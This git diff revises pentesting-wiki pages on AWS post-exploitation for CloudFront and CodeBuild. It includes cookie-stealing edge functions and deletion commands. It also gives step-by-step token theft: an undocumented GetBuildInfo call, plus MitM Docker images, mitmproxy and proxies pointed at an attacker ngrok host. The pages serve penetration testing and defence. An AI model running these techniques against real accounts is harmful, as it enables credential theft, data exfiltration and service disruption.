+- Treat any Runtime SSRF as potentially equivalent to metadata credential theft until MMDSv2-only behavior is verified.<sup>[[3]](#references)[[12]](#references)</sup>
+- Keep AgentCore execution roles tightly scoped because DNS tunneling turns "non-internet" code execution into a practical exfiltration channel.<sup>[[3]](#references)[[12]](#references)</sup>
 
 
 ## References
 
-- [When AI Remembers Too Much – Persistent Behaviors in Agents’ Memory (Unit 42)](https://unit42.paloaltonetworks.com/indirect-prompt-injection-poisons-ai-longterm-memory/)
-- [When an Attacker Meets a Group of Agents: Navigating Amazon Bedrock's Multi-Agent Applications (Unit 42)](https://unit42.paloaltonetworks.com/amazon-bedrock-multiagent-applications/)
-- [Cracks in the Bedrock: Escaping the AWS AgentCore Sandbox (Unit 42)](https://unit42.paloaltonetworks.com/bypass-of-aws-sandbox-network-isolation-mode/)
-- [Retain conversational context across multiple sessions using memory – Amazon Bedrock](https://docs.aws.amazon.com/bedrock/latest/userguide/agents-memory.html)
-- [How Amazon Bedrock Agents works](https://docs.aws.amazon.com/bedrock/latest/userguide/agents-how.html)
-- [Advanced prompt templates – Amazon Bedrock](https://docs.aws.amazon.com/bedrock/latest/userguide/advanced-prompts-templates.html)
-- [Configure advanced prompts – Amazon Bedrock](https://docs.aws.amazon.com/bedrock/latest/userguide/configure-advanced-prompts.html)
-- [Write a custom parser Lambda function in Amazon Bedrock Agents](https://docs.aws.amazon.com/bedrock/latest/userguide/lambda-parser.html)
-- [Monitor model invocation using CloudWatch Logs and Amazon S3 – Amazon Bedrock](https://docs.aws.amazon.com/bedrock/latest/userguide/model-invocation-logging.html)
-- [Track agent’s step-by-step reasoning process using trace – Amazon Bedrock](https://docs.aws.amazon.com/bedrock/latest/userguide/trace-events.html)
-- [Amazon Bedrock Guardrails](https://aws.amazon.com/bedrock/guardrails/)
-- [Understanding credentials management in Amazon Bedrock AgentCore](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/security-credentials-management.html)
-- [Resource management - Amazon Bedrock AgentCore](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/code-interpreter-resource-management.html)
+- [1] [When AI Remembers Too Much – Persistent Behaviors in Agents’ Memory (Unit 42)](https://unit42.paloaltonetworks.com/indirect-prompt-injection-poisons-ai-longterm-memory/)
+- [2] [When an Attacker Meets a Group of Agents: Navigating Amazon Bedrock's Multi-Agent Applications (Unit 42)](https://unit42.paloaltonetworks.com/amazon-bedrock-multiagent-applications/)
+- [3] [Cracks in the Bedrock: Escaping the AWS AgentCore Sandbox (Unit 42)](https://unit42.paloaltonetworks.com/bypass-of-aws-sandbox-network-isolation-mode/)
+- [4] [Retain conversational context across multiple sessions using memory – Amazon Bedrock](https://docs.aws.amazon.com/bedrock/latest/userguide/agents-memory.html)
+- [5] [How Amazon Bedrock Agents works](https://docs.aws.amazon.com/bedrock/latest/userguide/agents-how.html)
+- [6] [Advanced prompt templates – Amazon Bedrock](https://docs.aws.amazon.com/bedrock/latest/userguide/advanced-prompts-templates.html)
+- [7] [Configure advanced prompts – Amazon Bedrock](https://docs.aws.amazon.com/bedrock/latest/userguide/configure-advanced-prompts.html)
+- [8] [Write a custom parser Lambda function in Amazon Bedrock Agents](https://docs.aws.amazon.com/bedrock/latest/userguide/lambda-parser.html)
+- [9] [Monitor model invocation using CloudWatch Logs and Amazon S3 – Amazon Bedrock](https://docs.aws.amazon.com/bedrock/latest/userguide/model-invocation-logging.html)
+- [10] [Track agent’s step-by-step reasoning process using trace – Amazon Bedrock](https://docs.aws.amazon.com/bedrock/latest/userguide/trace-events.html)
+- [11] [Amazon Bedrock Guardrails](https://aws.amazon.com/bedrock/guardrails/)
+- [12] [Understanding credentials management in Amazon Bedrock AgentCore](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/security-credentials-management.html)
+- [13] [Resource management - Amazon Bedrock AgentCore](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/code-interpreter-resource-management.html)
+- [14] [Use multi-agent collaboration with Amazon Bedrock Agents](https://docs.aws.amazon.com/bedrock/latest/userguide/agents-multi-agent-collaboration.html)
+- [15] [Using DNS Firewall to filter outbound DNS traffic - Amazon Route 53](https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/resolver-dns-firewall.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation/README.md
@@ -1,7 +1,5 @@
 # AWS - CloudFront Post Exploitation
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## CloudFront
 
 For more information check:
@@ -11,9 +9,9 @@ For more information check:
 {{#endref}}
 
 ### `cloudfront:Delete*`
-An attacker granted cloudfront:Delete* can delete distributions, policies and other critical CDN configuration objects — for example distributions, cache/origin policies, key groups, origin access identities, functions/configs, and related resources. This can cause service disruption, content loss, and removal of configuration or forensic artifacts.
+A principal allowed `cloudfront:Delete*` can invoke multiple CloudFront delete actions, including deletion of web or streaming distributions, cache/origin-request/response-headers policies, key groups, CloudFront Functions, and origin access identities. A web distribution must already be disabled, and disabling it requires `cloudfront:UpdateDistribution`; deletion is irreversible.<sup>[[1]](#references)[[2]](#references)</sup>
 
-To delete a distribution an attacker could use:
+After the distribution is disabled, an authorized principal can delete it with the AWS CLI. The `--if-match` value must be the distribution ETag returned when it was disabled.<sup>[[2]](#references)</sup>
 
 ```bash
 aws cloudfront delete-distribution \
@@ -23,24 +21,34 @@ aws cloudfront delete-distribution \
 
 ### Man-in-the-Middle
 
-This [**blog post**](https://medium.com/@adan.alvarez/how-attackers-can-misuse-aws-cloudfront-access-to-make-it-rain-cookies-acf9ce87541c) proposes a couple of different scenarios where a **Lambda** could be added (or modified if it's already being used) into a **communication through CloudFront** with the purpose of **stealing** user information (like the session **cookie**) and **modifying** the **response** (injecting a malicious JS script).
+An attacker who can alter a distribution's edge-function associations can make CloudFront process viewer traffic at edge locations. CloudFront Functions support viewer-response triggers that run before a response reaches the viewer and can modify response headers, status, body, and cookies; Lambda@Edge also supports viewer- and origin-response triggers.<sup>[[3]](#references)[[4]](#references)[[5]](#references)[[6]](#references)</sup>
 
-#### scenario 1: MitM where CloudFront is configured to access some HTML of a bucket
+The [blog post](https://medium.com/@adan.alvarez/how-attackers-can-misuse-aws-cloudfront-access-to-make-it-rain-cookies-acf9ce87541c) demonstrates two ways an attacker could abuse that control to steal session data or alter content.<sup>[[9]](#references)</sup>
 
-- **Create** the malicious **function**.
-- **Associate** it with the CloudFront distribution.
-- Set the **event type to "Viewer Response"**.
+#### Scenario 1: MitM where CloudFront serves HTML from an S3 bucket
 
-Accessing the response you could steal the users cookie and inject a malicious JS.
+- Create a CloudFront Function that checks for a marker cookie.<sup>[[7]](#references)</sup>
+- Publish and associate it with the CloudFront distribution, using the `Viewer Response` event type.<sup>[[3]](#references)[[7]](#references)</sup>
+- If the marker is absent, replace the response with a redirect page that loads attacker-controlled JavaScript; the demonstration captures cookies, sets the marker to avoid repeated redirects, and sends the viewer back to the original CloudFront URL.<sup>[[4]](#references)[[7]](#references)[[10]](#references)</sup>
 
-#### scenario 2: MitM where CloudFront is already using a lambda function
+#### Scenario 2: MitM where CloudFront is already using a Lambda@Edge function
 
-- **Modify the code** of the lambda function to steal sensitive information
+- Modify the Lambda@Edge function to send request or event data to an external attacker-controlled server, then publish a new version and update the distribution association to use it.<sup>[[5]](#references)[[8]](#references)[[10]](#references)</sup>
 
-You can check the [**tf code to recreate this scenarios here**](https://github.com/adanalvarez/AWS-Attack-Scenarios/tree/main).
+Terraform code for recreating these scenarios is available in the [AWS Attack Scenarios repository](https://github.com/adanalvarez/AWS-Attack-Scenarios/tree/main).<sup>[[7]](#references)[[8]](#references)[[9]](#references)</sup>
+
+## References
+
+- [1] [Actions, resources, and condition keys for Amazon CloudFront](https://docs.aws.amazon.com/service-authorization/latest/reference/list_cloudfront.html)
+- [2] [DeleteDistribution - Amazon CloudFront](https://docs.aws.amazon.com/cloudfront/latest/APIReference/API_DeleteDistribution.html)
+- [3] [Customize at the edge with CloudFront Functions - Amazon CloudFront](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/cloudfront-functions.html)
+- [4] [Determine function purpose - Amazon CloudFront](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/function-code-choose-purpose.html)
+- [5] [How Lambda@Edge works with requests and responses - Amazon CloudFront](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/lambda-edge-event-request-response.html)
+- [6] [CloudFront Functions event structure - Amazon CloudFront](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/functions-event-structure.html)
+- [7] [CloudFront - Cookie Theft via CloudFront Function](https://github.com/adanalvarez/AWS-Attack-Scenarios/blob/main/CloudFront-Scenario1/README.md)
+- [8] [CloudFront - Data Exfiltration via Lambda Function Modification](https://github.com/adanalvarez/AWS-Attack-Scenarios/blob/main/CloudFront-Scenario2/README.md)
+- [9] [AWS Attack Scenarios](https://github.com/adanalvarez/AWS-Attack-Scenarios/tree/main)
+- [10] [How Attackers Can Misuse AWS CloudFront Access to Make It ‘Rain’ Cookies](https://medium.com/@adan.alvarez/how-attackers-can-misuse-aws-cloudfront-access-to-make-it-rain-cookies-acf9ce87541c)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
 

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md
@@ -1,7 +1,5 @@
 # AWS - CodeBuild Post Exploitation
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## CodeBuild
 
 For more information, check:
@@ -12,8 +10,11 @@ For more information, check:
 
 ### Check Secrets
 
-If credentials have been set in Codebuild to connect to Github, Gitlab or Bitbucket in the form of personal tokens, passwords or OAuth token access, these **credentials are going to be stored as secrets in the secret manager**.\
-Therefore, if you have access to read the secret manager you will be able to get these secrets and pivot to the connected platform.
+CodeBuild can authenticate to GitHub and Bitbucket with provider-specific options such as personal or access tokens, Secrets Manager secrets, connections, OAuth apps, and (for Bitbucket) app or API passwords. The current GitLab workflow uses a CodeConnections connection; the available options depend on the source provider and credential path.<sup>[[1]](#references)[[14]](#references)</sup>
+
+When a project uses a Secrets Manager-backed source credential, the secret contains the provider credential and the CodeBuild service role must be allowed to retrieve it. If your permissions allow you to read that secret, you may recover the external credential and pivot to the connected platform.<sup>[[2]](#references)[[3]](#references)</sup>
+
+CodeBuild-managed source credentials are different: `list-source-credentials` returns the provider/authentication metadata and token ARN, not the token value.<sup>[[4]](#references)</sup>
 
 {{#ref}}
 ../../aws-privilege-escalation/aws-secrets-manager-privesc/README.md
@@ -21,26 +22,24 @@ Therefore, if you have access to read the secret manager you will be able to get
 
 ### Abuse CodeBuild Repo Access
 
-In order to configure **CodeBuild**, it will need **access to the code repo** that it's going to be using. Several platforms could be hosting this code:
+To configure **CodeBuild**, the project needs a source repository and a credential or connection that can access it. GitHub, GitLab, and Bitbucket are examples of supported external source providers.<sup>[[1]](#references)[[3]](#references)[[14]](#references)</sup>
 
 <figure><img src="../../../../images/image (96).png" alt=""><figcaption></figcaption></figure>
 
-The **CodeBuild project must have access** to the configured source provider, either via **IAM role** of with a github/bitbucket **token or OAuth access**.
+The **CodeBuild project must have access** to the configured source provider through the appropriate source credential or connection. Its AWS service role is a separate control used to access dependent AWS services.<sup>[[3]](#references)</sup>
 
-An attacker with **elevated permissions in over a CodeBuild** could abuse this configured access to leak the code of the configured repo and others where the set creds have access.\
-In order to do this, an attacker would just need to **change the repository URL to each repo the config credentials have access** (note that the aws web will list all of them for you):
+An attacker who can edit a project or override source and build settings for a build could abuse this configured access to leak the code of the configured repository and others where the credentials have access. The attacker can **change the repository URL to each reachable repository** and run the build; `StartBuild` also supports per-build source and buildspec overrides.<sup>[[3]](#references)[[5]](#references)[[6]](#references)</sup>
 
 <figure><img src="../../../../images/image (107).png" alt=""><figcaption></figcaption></figure>
 
-And **change the Buildspec commands to exfiltrate each repo**.
+Then **change the Buildspec commands to exfiltrate each repository**.<sup>[[3]](#references)[[6]](#references)</sup>
 
 > [!WARNING]
-> However, this **task is repetitive and tedious** and if a github token was configured with **write permissions**, an attacker **won't be able to (ab)use those permissions** as he doesn't have access to the token.\
-> Or does he? Check the next section
+> Changing projects one by one is **repetitive and tedious**. CodeBuild can use a configured credential for source-provider interactions without returning the raw token material to the caller, so a token's write scope is not automatically equivalent to possession of the token. Check the next section for credential-leakage paths.<sup>[[4]](#references)[[5]](#references)</sup>
 
 ### Leaking Access Tokens from AWS CodeBuild
 
-You can leak access given in CodeBuild to platforms like Github. Check if any access to external platforms was given with:
+Use the following command to inventory external source-provider access. It returns configured provider/authentication metadata and token ARNs, but not the credential itself; see the linked page for build-based credential-leakage paths.<sup>[[4]](#references)</sup>
 
 ```bash
 aws codebuild list-source-credentials
@@ -52,7 +51,7 @@ aws-codebuild-token-leakage.md
 
 ### Untrusted PR execution via webhook filter misconfiguration
 
-If webhook filters are weak, external attackers can get their PRs built in privileged CodeBuild projects and then execute arbitrary code in CI.
+If webhook filters are weak, external pull requests may trigger builds in a project whose service role has privileged AWS access. Code from such a build executes with the project role, so attacker-controlled pull requests can gain a path to secrets, AWS resources, or source-provider access available to the build. AWS recommends actor and file-path filters, least-privilege build roles, and keeping the buildspec outside untrusted pull-request source.<sup>[[7]](#references)</sup>
 
 {{#ref}}
 aws-codebuild-untrusted-pr-webhook-bypass.md
@@ -60,36 +59,53 @@ aws-codebuild-untrusted-pr-webhook-bypass.md
 
 ### `codebuild:DeleteProject`
 
-An attacker could delete an entire CodeBuild project, causing loss of project configuration and impacting applications relying on the project.
+An attacker with `codebuild:DeleteProject` could delete an entire CodeBuild project. AWS notes that the project's builds are not deleted, but the project configuration is removed, which can impact applications or pipelines relying on the project.<sup>[[8]](#references)</sup>
 
 ```bash
 aws codebuild delete-project --name <value>
 ```
 
-**Potential Impact**: Loss of project configuration and service disruption for applications using the deleted project.
+**Potential Impact**: Loss of project configuration and service disruption for applications using the deleted project.<sup>[[8]](#references)</sup>
 
-### `codebuild:TagResource` , `codebuild:UntagResource`
+### `codebuild:UpdateProject` (project tags)
 
-An attacker could add, modify, or remove tags from CodeBuild resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags.
+An attacker with `codebuild:UpdateProject` could add, modify, or remove project tags by submitting an updated `tags` list. Tags can support resource organization, cost tracking, and IAM conditions, so changing them may disrupt cost allocation, resource tracking, and tag-based access control policies.<sup>[[9]](#references)[[10]](#references)[[11]](#references)[[13]](#references)</sup>
 
 ```bash
-aws codebuild tag-resource --resource-arn <value> --tags <value>
-aws codebuild untag-resource --resource-arn <value> --tag-keys <value>
+# Supply the complete tag list that should remain on the project.
+aws codebuild update-project --name <value> --tags key=<key>,value=<value>
 ```
 
-**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies.
+To remove a tag, submit an updated project configuration whose `tags` list omits it.<sup>[[9]](#references)</sup>
+
+**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies.<sup>[[9]](#references)[[10]](#references)[[11]](#references)[[13]](#references)</sup>
 
 ### `codebuild:DeleteSourceCredentials`
 
-An attacker could delete source credentials for a Git repository, impacting the normal functioning of applications relying on the repository.
+An attacker with `codebuild:DeleteSourceCredentials` could delete GitHub, GitHub Enterprise, or Bitbucket source credentials, impacting builds, webhooks, and other projects that rely on those credentials.<sup>[[5]](#references)[[12]](#references)</sup>
 
 ```sql
 aws codebuild delete-source-credentials --arn <value>
 ```
 
-**Potential Impact**: Disruption of normal functioning for applications relying on the affected repository due to the removal of source credentials.
+**Potential Impact**: Disruption of normal functioning for applications relying on the affected repository due to the removal of source credentials.<sup>[[5]](#references)[[12]](#references)</sup>
+
+## References
+
+- [1] [Access your source provider in CodeBuild](https://docs.aws.amazon.com/codebuild/latest/userguide/access-tokens.html)
+- [2] [Create and store a token in a Secrets Manager secret](https://docs.aws.amazon.com/codebuild/latest/userguide/asm-create-secret.html)
+- [3] [Create a build project in AWS CodeBuild](https://docs.aws.amazon.com/codebuild/latest/userguide/create-project.html)
+- [4] [ListSourceCredentials - AWS CodeBuild](https://docs.aws.amazon.com/codebuild/latest/APIReference/API_ListSourceCredentials.html)
+- [5] [Multiple access tokens in CodeBuild](https://docs.aws.amazon.com/codebuild/latest/userguide/multiple-access-tokens.html)
+- [6] [StartBuild - AWS CodeBuild](https://docs.aws.amazon.com/codebuild/latest/APIReference/API_StartBuild.html)
+- [7] [Use webhooks with AWS CodeBuild](https://docs.aws.amazon.com/codebuild/latest/userguide/webhooks.html)
+- [8] [DeleteProject - AWS CodeBuild](https://docs.aws.amazon.com/codebuild/latest/APIReference/API_DeleteProject.html)
+- [9] [Edit tags for a project - AWS CodeBuild](https://docs.aws.amazon.com/codebuild/latest/userguide/how-to-tag-project-update.html)
+- [10] [Tag build projects - AWS CodeBuild](https://docs.aws.amazon.com/codebuild/latest/userguide/how-to-tag-project.html)
+- [11] [Using tags to control access to AWS CodeBuild resources](https://docs.aws.amazon.com/codebuild/latest/userguide/auth-and-access-control-using-tags.html)
+- [12] [DeleteSourceCredentials - AWS CodeBuild](https://docs.aws.amazon.com/codebuild/latest/APIReference/API_DeleteSourceCredentials.html)
+- [13] [Best practices and strategies for AWS tags](https://docs.aws.amazon.com/tag-editor/latest/userguide/best-practices-and-strats.html)
+- [14] [GitLab access in CodeBuild](https://docs.aws.amazon.com/codebuild/latest/userguide/access-tokens-gitlab-overview.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
 

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md
@@ -1,10 +1,8 @@
 # AWS Codebuild - Token Leakage
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Recover Github/Bitbucket Configured Tokens
 
-First, check if there are any source credentials configured that you could leak:
+First, check whether the account has source credentials configured that could be exposed:<sup>[[3]](#references)</sup>
 
 ```bash
 aws codebuild list-source-credentials
@@ -12,9 +10,9 @@ aws codebuild list-source-credentials
 
 ### Via RCE in CodeBuild Job
 
-From within a CodeBuild job, you can hit an undocumented AWS CodeBuild API endpoint which will return you the credentials used by CodeBuild. This can be used to obtain the credentials the CodeBuild job was setup with e.g. AWS CodeConnection credentials, OAUTH or PAT credentials. The CodeBuild job does not need to be privileged to hit this endpoint and it is also hard to detect in logging and monitoring as CodeBuild itself calls this endpoint several times on startup. 
+From a running non-runner CodeBuild job, the undocumented `CoFaTokenService_Agent.GetBuildInfo` operation at `https://codebuild-builds.<region>.amazonaws.com/` can return the GitHub or Bitbucket credential used to fetch the project's source. Testing also showed that the response can expose OAuth or personal access tokens, that neither the credential agent nor privileged mode is required, and that the request is logged as `GetConnectionToken` in CloudTrail alongside the normal bootstrap calls.<sup>[[1]](#references)[[2]](#references)</sup>
 
-The technique is explained further in [https://thomaspreece.com/2026/03/23/part-2-aws-codebuild-escalating-privileges-via-aws-codeconnections/](https://thomaspreece.com/2026/03/23/part-2-aws-codebuild-escalating-privileges-via-aws-codeconnections/) but in summary to obtain credentials within the CodeBuild job you just need to run the following:
+The technique is explained further in [Thomas Preece's research](https://thomaspreece.com/2026/03/23/part-2-aws-codebuild-escalating-privileges-via-aws-codeconnections/). The accompanying script signs a `GetBuildInfo` request with the build credentials and sends the `CODEBUILD_BUILD_ARN` value to the regional endpoint:<sup>[[1]](#references)[[2]](#references)</sup>
 
 ```
 python -m pip install botocore boto3 requests
@@ -24,17 +22,17 @@ python ./GetBuildInfo.py
 
 ### Via Docker Image
 
-If you find that authentication to for example Github is set in the account, you can **exfiltrate** that **access** (**GH token or OAuth token**) by making Codebuild to **use an specific docker image** to run the build of the project.
+If source authentication is configured for GitHub or Bitbucket, a user who can alter the CodeBuild environment can **exfiltrate** the resulting **access token** (for example, a GitHub token or OAuth token) by making CodeBuild use a custom Docker image for the build.
 
-For this purpose you could **create a new Codebuild project** or change the **environment** of an existing one to set the **Docker image**.
+For this purpose, **create a new CodeBuild project** or change the **environment** of an existing one to set the **Docker image**. CodeBuild build environments use Docker images from the CodeBuild repository, Docker Hub, or Amazon ECR.<sup>[[4]](#references)[[5]](#references)</sup>
 
-The Docker image you could use is [https://github.com/carlospolop/docker-mitm](https://github.com/carlospolop/docker-mitm). This is a very basic Docker image that will set the **env variables `https_proxy`**, **`http_proxy`** and **`SSL_CERT_FILE`**. This will allow you to intercept most of the traffic of the host indicated in **`https_proxy`** and **`http_proxy`** and trusting the SSL CERT indicated in **`SSL_CERT_FILE`**.
+The [docker-mitm image](https://github.com/carlospolop/docker-mitm) sets `https_proxy`, optional `http_proxy`, `no_proxy`, and `SSL_CERT_FILE`. With a CA certificate trusted by the image, a controlled proxy can inspect selected outbound traffic while `no_proxy` prevents interception of metadata and AWS endpoints.<sup>[[4]](#references)</sup>
 
 1. **Create & Upload your own Docker MitM image**
-   - Follow the instructions of the repo to set your proxy IP address and set your SSL cert and **build the docker image**.
+   - Follow the instructions of the repo to set your proxy IP address and set your SSL cert and **build the docker image**.<sup>[[4]](#references)</sup>
      - **DO NOT SET `http_proxy`** to not intercept requests to the metadata endpoint.
-   - You could use **`ngrok`** like `ngrok tcp 4444` lo set the proxy to your host
-   - Once you have the Docker image built, **upload it to a public repo** (Dockerhub, ECR...)
+   - You could use **`ngrok`** like `ngrok tcp 4444` to set the proxy to your host.<sup>[[4]](#references)</sup>
+   - Once you have the Docker image built, **upload it to a public repo** (Dockerhub, ECR...).<sup>[[4]](#references)</sup>
 2. **Set the environment**
    - Create a **new Codebuild project** or **modify** the environment of an existing one.
    - Set the project to use the **previously generated Docker image**
@@ -43,28 +41,31 @@ The Docker image you could use is [https://github.com/carlospolop/docker-mitm](h
 
 3. **Set the MitM proxy in your host**
 
-- As indicated in the **Github repo** you could use something like:
+- As indicated in the **GitHub repo**, you could use something like:<sup>[[4]](#references)</sup>
 
 ```bash
 mitmproxy --listen-port 4444  --allow-hosts "github.com"
 ```
 
 > [!TIP]
-> The **mitmproxy version used was 9.0.1**, it was reported that with version 10 this might not work.
+> The docker-mitm instructions were tested with **mitmproxy 9.0.1**; newer versions may require adjustments.<sup>[[4]](#references)</sup>
 
 4. **Run the build & capture the credentials**
 
 - You can see the token in the **Authorization** header:
 
-  <figure><img src="../../../../images/image (273).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../../images/image (273).png" alt=""><figcaption></figcaption></figure>
 
-This could also be done from the aws cli with something like
+This could also be done from the AWS CLI with something like:<sup>[[7]](#references)</sup>
 
 ```bash
 # Create project using a Github connection
-aws codebuild create-project --cli-input-json file:///tmp/buildspec.json
+aws codebuild create-project --cli-input-json file:///tmp/project.json
+```
 
-## With /tmp/buildspec.json
+With `/tmp/project.json`:
+
+```json
 {
     "name": "my-demo-project",
     "source": {
@@ -75,39 +76,39 @@ aws codebuild create-project --cli-input-json file:///tmp/buildspec.json
     "artifacts": {
         "type": "NO_ARTIFACTS"
     },
+    "serviceRole": "arn:aws:iam::<account-id>:role/<codebuild-service-role>",
     "environment": {
-        "type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM
+        "type": "LINUX_CONTAINER",
         "image": "docker.io/carlospolop/docker-mitm:v12",
         "computeType": "BUILD_GENERAL1_SMALL",
         "imagePullCredentialsType": "CODEBUILD"
     }
 }
-
-## Json
-
-# Start the build
-aws codebuild start-build --project-name my-project2
 ```
 
-### Via insecureSSL
+Start the build:
 
-**Codebuild** projects have a setting called **`insecureSsl`** that is hidden in the web you can only change it from the API.\
-Enabling this, allows to Codebuild to connect to the repository **without checking the certificate** offered by the platform.
+```bash
+aws codebuild start-build --project-name my-demo-project
+```
 
-- First you need to enumerate the current configuration with something like:
+### Via `insecureSsl` (GitHub Enterprise Server)
+
+AWS documents **`insecureSsl`** for GitHub Enterprise Server projects. It makes CodeBuild ignore TLS warnings when connecting to the source and is intended for testing; do not assume it applies to GitHub.com or Bitbucket projects.<sup>[[7]](#references)</sup>
+
+- First enumerate the current configuration with something like:<sup>[[8]](#references)</sup>
 
 ```bash
 aws codebuild batch-get-projects --name <proj-name>
 ```
 
-- Then, with the gathered info you can update the project setting **`insecureSsl`** to **`True`**. The following is an example of my updating a project, notice the **`insecureSsl=True`** at the end (this is the only thing you need to change from the gathered configuration).
-  - Moreover, add also the env variables **http_proxy** and **https_proxy** pointing to your tcp ngrok like:
+- Then update the project setting **`insecureSsl`** to **`true`**. The following example also adds `http_proxy` and `https_proxy` environment variables pointing to the TCP ngrok listener; AWS documents project-level proxy environment variables for explicit proxies.<sup>[[7]](#references)[[9]](#references)</sup>
 
 ```bash
 aws codebuild update-project --name <proj-name> \
     --source '{
-        "type": "GITHUB",
-        "location": "https://github.com/carlospolop/404checker",
+        "type": "GITHUB_ENTERPRISE",
+        "location": "https://github.example.com/uname/repo",
         "gitCloneDepth": 1,
         "gitSubmodulesConfig": {
             "fetchSubmodules": false
@@ -115,7 +116,7 @@ aws codebuild update-project --name <proj-name> \
         "buildspec": "version: 0.2\n\nphases:\n  build:\n    commands:\n       - echo \"sad\"\n",
         "auth": {
             "type": "CODECONNECTIONS",
-            "resource": "arn:aws:codeconnections:eu-west-1:947247140022:connection/46cf78ac-7f60-4d7d-bf86-5011cfd3f4be"
+            "resource": "<connection-arn>"
         },
         "reportBuildStatus": false,
         "insecureSsl": true
@@ -137,7 +138,7 @@ aws codebuild update-project --name <proj-name> \
     }'
 ```
 
-- Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http_proxy and https_proxy)
+- Then, run the basic example from [synchronizing/mitm](https://github.com/synchronizing/mitm) on the port pointed to by the proxy variables (`http_proxy` and `https_proxy`). The tool supports HTTP and HTTPS interception and logs the proxied requests.<sup>[[6]](#references)</sup>
 
 ```python
 from mitm import MITM, protocol, middleware, crypto
@@ -152,15 +153,16 @@ mitm = MITM(
 mitm.run()
 ```
 
-- Finally, click on **Build the project**, the **credentials** will be **sent in clear text** (base64) to the mitm port:
+- Finally, click on **Build the project**. The source-provider request and its `Authorization` header should be visible to the MITM listener; Basic authentication is base64-encoded rather than encrypted at the header layer.<sup>[[4]](#references)[[6]](#references)</sup>
 
 <figure><img src="../../../../images/image (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 ### ~~Via HTTP protocol~~
 
-> [!TIP] > **This vulnerability was corrected by AWS at some point the week of the 20th of Feb of 2023 (I think on Friday). So an attacker can't abuse it anymore :)**
+> [!TIP]
+> **This vulnerability was corrected by AWS at some point the week of the 20th of Feb of 2023 (I think on Friday). So an attacker can't abuse it anymore :)**
 
-An attacker with **elevated permissions in over a CodeBuild could leak the Github/Bitbucket token** configured or if permissions was configured via OAuth, the **temporary OAuth token used to access the code**.
+An attacker with **elevated permissions over a CodeBuild project could leak the configured GitHub/Bitbucket token** or, if access was configured via OAuth, the **temporary OAuth token used to access the code**.
 
 - An attacker could add the environment variables **http_proxy** and **https_proxy** to the CodeBuild project pointing to his machine (for example `http://5.tcp.eu.ngrok.io:14972`).
 
@@ -169,7 +171,7 @@ An attacker with **elevated permissions in over a CodeBuild could leak the Githu
 <figure><img src="../../../../images/image (213).png" alt=""><figcaption></figcaption></figure>
 
 - Then, change the URL of the github repo to use HTTP instead of HTTPS, for example: `http://github.com/carlospolop-forks/TestActions`
-- Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http_proxy and https_proxy)
+- Then, run the basic example from [synchronizing/mitm](https://github.com/synchronizing/mitm) on the port pointed to by the proxy variables (`http_proxy` and `https_proxy`).<sup>[[6]](#references)</sup>
 
 ```python
 from mitm import MITM, protocol, middleware, crypto
@@ -190,7 +192,7 @@ mitm.run()
 aws codebuild start-build --project-name <proj-name>
 ```
 
-- Finally, the **credentials** will be **sent in clear text** (base64) to the mitm port:
+- Finally, the **credentials** will be visible to the MITM listener; Basic authentication encodes the value as base64 rather than encrypting it.<sup>[[6]](#references)</sup>
 
 <figure><img src="../../../../images/image (159).png" alt=""><figcaption></figcaption></figure>
 
@@ -205,7 +207,15 @@ For the PR-triggered webhook bypass chain (`ACTOR_ACCOUNT_ID` regex + untrusted 
 aws-codebuild-untrusted-pr-webhook-bypass.md
 {{#endref}}
 
+## References
+
+- [1] [AWS-CodeFactoryTokenService-API: GetBuildInfo.py](https://raw.githubusercontent.com/thomaspreece/AWS-CodeFactoryTokenService-API/main/GetBuildInfo.py)
+- [2] [Part 2: AWS CodeBuild (Escalating Privileges via AWS CodeConnections)](https://thomaspreece.com/2026/03/23/part-2-aws-codebuild-escalating-privileges-via-aws-codeconnections/)
+- [3] [list-source-credentials — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/codebuild/list-source-credentials.html)
+- [4] [docker-mitm](https://github.com/carlospolop/docker-mitm)
+- [5] [Build environment reference for AWS CodeBuild](https://docs.aws.amazon.com/codebuild/latest/userguide/build-env-ref.html)
+- [6] [synchronizing/mitm](https://github.com/synchronizing/mitm)
+- [7] [Create a build project in AWS CodeBuild](https://docs.aws.amazon.com/codebuild/latest/userguide/create-project.html)
+- [8] [batch-get-projects — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/codebuild/batch-get-projects.html)
+- [9] [Use AWS CodeBuild with a proxy server](https://docs.aws.amazon.com/codebuild/latest/userguide/use-proxy-server.html)
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-

